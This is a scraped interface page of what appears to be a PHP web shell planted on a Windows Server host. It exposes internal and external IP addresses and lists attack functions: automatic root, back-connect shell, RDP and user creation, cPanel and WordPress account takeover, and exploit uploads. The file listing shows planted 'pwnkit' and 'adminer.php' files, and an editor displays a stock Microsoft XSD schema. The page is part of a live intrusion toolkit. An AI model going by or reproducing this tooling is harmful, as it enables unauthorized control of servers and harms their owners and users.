Windows NT IZOXMIX7871CBCZ 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
: 172.23.17.241 | : 216.73.216.124
Cant Read [ /etc/named.conf ]
8.2.12
Administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
C: /
Windows /
security /
[ HOME SHELL ]
Name
Size
Permission
Action
ApplicationId
[ DIR ]
drwxrwxrwx
audit
[ DIR ]
drwxrwxrwx
cap
[ DIR ]
drwxrwxrwx
database
[ DIR ]
drwxrwxrwx
logs
[ DIR ]
drwxrwxrwx
msscw
[ DIR ]
drwxrwxrwx
templates
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-rw-rw-
FirewallPolicy.xsd
17.54
KB
-rw-rw-rw-
KB.xsd
23.08
KB
-rw-rw-rw-
KBRegistration.xsd
1.87
KB
-rw-rw-rw-
KBRegistrationInfo.xsd
1.07
KB
-rw-rw-rw-
RuleResults.xsd
3.16
KB
-rw-rw-rw-
SMEFRules.xml
5.45
KB
-rw-rw-rw-
SampleMachineList.xml
484
B
-rw-rw-rw-
SecPol.xsd
2.97
KB
-rw-rw-rw-
SecReg.xsd
2.45
KB
-rw-rw-rw-
adminer.php
465.43
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : SecReg.xsd
<?xml version="1.0" encoding="utf-8" ?> <!-- **********************************************************************--> <!-- --> <!-- Copyright (c) 2000-2001 Microsoft Corporation --> <!-- --> <!-- This schema defines the rule xml information --> <!-- --> <!-- **********************************************************************--> <xsd:schema elementFormDefault="qualified" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <!-- Top level node "Rule" contianing the rule information--> <xsd:element name="Rule"> <xsd:complexType> <xsd:sequence> <!-- each rule can support more than one action--> <xsd:element name="Action" type="ActionType" minOccurs="1" maxOccurs="6" /> </xsd:sequence> <!-- A Rule information xml needs to decalre which version of the schema it is following--> <xsd:attribute name="SchemaVersion" type="xsd:string" use="required" /> <!-- A unique Name idententifier for the Rule--> <xsd:attribute name="Name" type="xsd:string" use="required" /> <!-- The Rule version--> <xsd:attribute name="RuleVersion" type="xsd:string" use="required" /> <!-- Type of the Rule--> <xsd:attribute name="Type" type="TypeType" use="required" /> </xsd:complexType> </xsd:element> <!-- For each action the rule defines it will have an "Action" Element--> <xsd:complexType name="ActionType"> <xsd:sequence> <!-- Each action element has its own associated script--> <xsd:element name="Script" type="xsd:string" minOccurs="1" maxOccurs="1" /> </xsd:sequence> <!-- and Action name defining the action that this script perform--> <xsd:attribute name="ActionName" type="ActionNameType" use="required" /> </xsd:complexType> <!--Currently supported actions--> <xsd:simpleType name="ActionNameType"> <xsd:restriction base="xsd:string"> <xsd:enumeration value="Check" /> <xsd:enumeration value="Configure" /> <xsd:enumeration value="GenerateRollback" /> <xsd:enumeration value="Transform" /> </xsd:restriction> </xsd:simpleType> <!--Currently supported Rule types--> <xsd:simpleType name="TypeType"> <xsd:restriction base="xsd:string"> <xsd:enumeration value="COM" /> </xsd:restriction> </xsd:simpleType> </xsd:schema>
Close